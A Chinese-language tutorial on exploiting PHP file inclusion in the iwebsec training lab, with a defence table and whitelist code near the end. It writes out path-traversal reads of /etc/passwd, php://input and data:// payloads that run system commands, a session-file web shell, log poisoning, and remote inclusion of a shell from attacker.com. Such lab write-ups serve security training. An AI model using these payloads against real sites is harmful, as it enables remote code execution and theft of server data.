PHP 文件包含漏洞实战:iwebsec 靶场 10 关核心绕过手法与伪协议利用
PHP 文件包含漏洞实战iwebsec 靶场 10 关核心绕过手法与伪协议利用在 Web 安全领域文件包含漏洞File Inclusion Vulnerability一直是渗透测试中的高频攻击点。这种漏洞允许攻击者通过动态包含恶意文件来执行任意代码或读取敏感数据。本文将基于 iwebsec 靶场系统化剖析 10 种典型文件包含场景的绕过手法与伪协议利用技巧。1. 靶场环境快速搭建iwebsec 靶场提供 Docker 化部署方案执行以下命令即可启动环境docker pull iwebsec/iwebsec docker run -d -p 8001:80 --name iwebsec iwebsec/iwebsec关键目录结构说明/var/www/html/fi/文件包含漏洞实验脚本/var/lib/php/session/PHP Session 存储目录/etc/php/7.4/apache2/php.iniPHP 配置文件提示实验前建议修改 php.ini 的以下参数allow_url_fopen Onallow_url_include Onsession.save_path /var/lib/php/session2. 基础文件包含漏洞原理PHP 文件包含主要通过四个函数实现函数区别错误处理include()包含失败仅警告继续执行require()包含失败致命错误终止执行include_once()避免重复包含继续执行require_once()避免重复包含终止执行典型漏洞代码示例?php $file $_GET[file]; include($file); ?3. 本地文件包含LFI实战3.1 基础文件读取直接包含系统敏感文件/fi/01.php?filename../../../../etc/passwd常见敏感文件路径- Linux: - /etc/passwd - /proc/self/environ - /var/log/apache2/access.log - Windows: - C:\Windows\win.ini - C:\xampp\apache\conf\extra\httpd-xampp.conf3.2 路径遍历绕过当过滤../时尝试以下变种/fi/02.php?filename....//....//....//etc/passwd编码绕过方案# URL 双重编码 print(quote(quote(../../../../etc/passwd))) # 输出%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd4. 伪协议深度利用4.1 php://filter 源码读取通过 base64 编码读取 PHP 文件源码/fi/06.php?filenamephp://filter/convert.base64-encode/resourceindex.php解码获取源码echo PD9waHA... | base64 -d4.2 php://input 代码执行POST 方式提交恶意代码GET /fi/08.php?filenamephp://input HTTP/1.1 Host: target.com ?php system(id);?4.3 data:// 直接执行Base64 编码执行/fi/10.php?filenamedata://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOz8原始数据执行/fi/10.php?filenamedata://text/plain,?php phpinfo();?5. 高级绕过技术5.1 Session 文件包含利用流程注入 PHP 代码到 Session/fi/03.php?iwebsec?php system($_GET[cmd]);?获取 Session IDPHPSESSID包含 Session 文件/fi/01.php?filename../../../../var/lib/php/session/sess_[PHPSESSID]5.2 日志文件注入Apache 日志注入步骤伪造包含 PHP 代码的请求GET /?php phpinfo();? HTTP/1.1 Host: target.com包含日志文件/fi/01.php?filename../../../../var/log/apache2/access.log5.3 远程文件包含RFI基础利用/fi/04.php?filenamehttp://attacker.com/shell.txt绕过限制技巧使用问号截断/fi/05.php?filenamehttp://attacker.com/shell.txt?使用井号截断/fi/05.php?filenamehttp://attacker.com/shell.txt%236. 防御方案对比防御措施有效性实施成本备注白名单校验★★★★★中需维护合法文件列表禁用危险函数★★★★低影响正常功能目录限制★★★低可能被绕过文件内容校验★★高性能影响较大推荐加固代码示例$allowed [header.php, footer.php]; if(in_array($_GET[file], $allowed)) { include($_GET[file]); } else { die(Invalid file!); }7. 自动化测试方案使用 Python 实现基础检测import requests targets [ /fi/01.php?filename../../../../etc/passwd, /fi/06.php?filenamephp://filter/convert.base64-encode/resourceindex.php ] for url in targets: r requests.get(fhttp://target.com{url}) if root:x:0:0 in r.text or PD9waHA in r.text: print(f[] Vulnerable: {url})8. 实战经验总结信息收集优先通过phpinfo()确认allow_url_include和session.save_path等关键配置组合利用技巧文件上传 文件包含 GetshellLFI 日志文件 RCESession 包含 代码注入 持久化后门绕过思维导图[过滤../] -- 使用....// -- URL编码 -- 超长路径截断 [限制后缀] -- %00截断(PHP5.3) -- 问号截断 -- 伪协议绕过在真实渗透测试中文件包含漏洞往往需要结合具体环境特征进行变异利用。建议在掌握基础手法后通过修改请求头、尝试非常规路径等方式进行深度测试。

相关新闻

时域与频域采样定理对偶性解析:从DFT/IDFT到混叠现象的3个核心验证

时域与频域采样定理对偶性解析:从DFT/IDFT到混叠现象的3个核心验证

时域与频域采样定理对偶性解析:从DFT/IDFT到混叠现象的3个核心验证数字信号处理领域中,采样定理是连接模拟世界与数字世界的桥梁。当我们深入观察时域采样和频域采样时,会发现它们呈现出惊人的对称性——这种对偶关系不仅具有数学美感&#x…

2026/7/8 20:29:08阅读更多 →
WordPress Activity Monitor 插件漏洞利用:CVE-2018-15877 复现与 3 种反弹 Shell 方法对比

WordPress Activity Monitor 插件漏洞利用:CVE-2018-15877 复现与 3 种反弹 Shell 方法对比

WordPress Activity Monitor 插件漏洞深度剖析:CVE-2018-15877 实战与多维度利用方案在Web安全领域,插件漏洞一直是攻击者最青睐的突破口之一。WordPress作为全球使用最广泛的内容管理系统,其插件生态的开放性也带来了安全隐患。本文将聚焦Ac…

2026/7/8 20:29:08阅读更多 →
Burp Suite CO2 1.2.0 插件实战:5步集成SQLMap自动化SQL注入检测

Burp Suite CO2 1.2.0 插件实战:5步集成SQLMap自动化SQL注入检测

Burp Suite CO2 1.2.0 插件实战:5步集成SQLMap自动化SQL注入检测 在Web安全测试领域,效率与精准度往往决定着渗透测试的成功率。Burp Suite作为行业标杆的Web应用安全测试平台,其强大的可扩展性通过各类插件得到充分释放。本文将深入解析CO2…

2026/7/8 20:24:08阅读更多 →
UEFI 2.10 启动流程深度解析:从 SEC 到 RT 的 7 个阶段与 3 个关键数据结构

UEFI 2.10 启动流程深度解析:从 SEC 到 RT 的 7 个阶段与 3 个关键数据结构

UEFI 2.10 启动流程深度解析:从 SEC 到 RT 的 7 个阶段与 3 个关键数据结构现代计算机系统的启动过程是一个精密编排的"交响乐",而UEFI(统一可扩展固件接口)则是这场演出的总指挥。与传统的BIOS相比,UEFI 2.…

2026/7/8 21:14:18阅读更多 →
Linux 命令行连接 WiFi:3 种主流工具 (iw/nmcli/wpa_supplicant) 场景与性能对比

Linux 命令行连接 WiFi:3 种主流工具 (iw/nmcli/wpa_supplicant) 场景与性能对比

Linux 命令行连接 WiFi:3 种主流工具场景与性能深度对比在服务器机房昏暗的灯光下,你盯着那台刚上架的裸金属服务器——没有显示器,没有键盘,只有一个闪烁的网口指示灯。这是许多运维工程师都熟悉的场景:如何通过纯命令…

2026/7/8 21:14:18阅读更多 →
Diskpart 命令实战:3步彻底清除U盘EFI/启动分区,恢复完整容量

Diskpart 命令实战:3步彻底清除U盘EFI/启动分区,恢复完整容量

彻底清除U盘EFI分区的3步终极方案:Diskpart命令实战指南你是否遇到过这样的困扰:曾经用于制作系统启动盘的U盘,在Windows磁盘管理中显示为多个分区,而关键的EFI分区却无法通过常规方式删除?这种残留的启动分区不仅占用…

2026/7/8 21:14:18阅读更多 →
Windows 11/10 Diskpart 格式化U盘:NTFS/FAT32/exFAT 3种文件系统命令对比

Windows 11/10 Diskpart 格式化U盘:NTFS/FAT32/exFAT 3种文件系统命令对比

Windows 11/10 Diskpart 格式化U盘终极指南:NTFS/FAT32/exFAT深度对比与实战1. 文件系统核心差异与选择策略在Windows环境下格式化U盘时,NTFS、FAT32和exFAT三种文件系统的选择直接影响设备兼容性和使用体验。理解它们的底层差异比记住格式化命令更重要—…

2026/7/8 21:14:18阅读更多 →
Wine 9.0 Staging vs Deepin-Wine 6:2 种方案在 Linux Mint 部署微信实测

Wine 9.0 Staging vs Deepin-Wine 6:2 种方案在 Linux Mint 部署微信实测

Wine 9.0 Staging 与 Deepin-Wine 6 在 Linux Mint 上的微信部署实战对比对于 Linux 用户来说,在桌面环境中使用微信一直是个令人头疼的问题。虽然腾讯官方推出了 Linux 版微信,但功能相对简陋,更新缓慢。本文将深入对比两种主流解决方案——…

2026/7/8 21:14:18阅读更多 →
WSL2 Ubuntu 22.04 SSH 服务配置:3步实现 XShell 7 免密登录与开机自启

WSL2 Ubuntu 22.04 SSH 服务配置:3步实现 XShell 7 免密登录与开机自启

WSL2 Ubuntu 22.04 SSH 服务深度配置指南:从免密登录到系统级自启优化1. 为什么需要配置WSL2的SSH服务?对于习惯使用XShell等专业终端工具的开发者而言,Windows Terminal虽然提供了基础的WSL访问能力,但在多会话管理、标签页操作、…

2026/7/8 21:09:17阅读更多 →
从GitHub安全案例解析常见漏洞与防护实践

从GitHub安全案例解析常见漏洞与防护实践

1. 项目概述:从GitHub Trending看安全实战 最近在GitHub Trending上看到一个项目,叫 skills4/skills ,它因为一些安全漏洞案例被大家讨论。这其实是一个挺典型的场景:一个旨在展示或教授某种技能的仓库,本身却成了安…

2026/7/8 5:12:14阅读更多 →
MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

# MLT 2026启示:因果推理与概率建模驱动下一代LLM应用## 一、背景与挑战:从“黑箱预测”到“可信推理”2026年6月,第7届机器学习与趋势国际会议(MLT 2026)将在悉尼召开。会议议程中,“因果与可解释机器学习…

2026/7/8 7:00:12阅读更多 →
通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

1. 项目概述与漏洞背景最近在梳理一些历史OA系统的安全风险时,通达OA v11.6版本中的一个老漏洞又进入了我的视线。这个漏洞位于/general/bi_design/appcenter/report_bi.func.php文件中,是一个典型的SQL注入点。虽然这个漏洞的利用方式看起来并不复杂&am…

2026/7/8 2:26:06阅读更多 →
作为一个给团队打绩效的人,我想说几句

作为一个给团队打绩效的人,我想说几句

我每半年都会给团队成员打绩效,也会参与和 CTO 的绩效校准,所以从管理者的视角,说说这件事 首先,我先把结论告诉你:接受结果,但一定要把原因问清楚。 因为当绩效公布到你这里的时候,结果基本已…

2026/7/8 0:01:17阅读更多 →
A股股指期货:全维度解析(多表格结构化完整版)

A股股指期货:全维度解析(多表格结构化完整版)

一、基础定义与核心本质股指期货全称股票价格指数期货,是中国金融期货交易所(中金所)上市的标准化金融期货合约,交易标的为 A 股大盘指数,约定未来特定时间按约定价格现金交割指数涨跌差价,不交割一篮子股票…

2026/7/8 0:01:17阅读更多 →
iOS越狱新手指南:从困惑到掌控,3天解锁iPhone无限潜能的真实故事

iOS越狱新手指南:从困惑到掌控,3天解锁iPhone无限潜能的真实故事

iOS越狱新手指南:从困惑到掌控,3天解锁iPhone无限潜能的真实故事 【免费下载链接】Jailbreak iOS 26.4 - 26, 17 - 17.7.5 & iOS 18 - 18.7.3 Jailbreak Tools, Cydia/Sileo/Zebra Tweaks & Jailbreak News Updates || AI Jailbreak Finder &…

2026/7/8 0:01:17阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/8 6:59:54阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/8 13:42:39阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/8 13:42:39阅读更多 →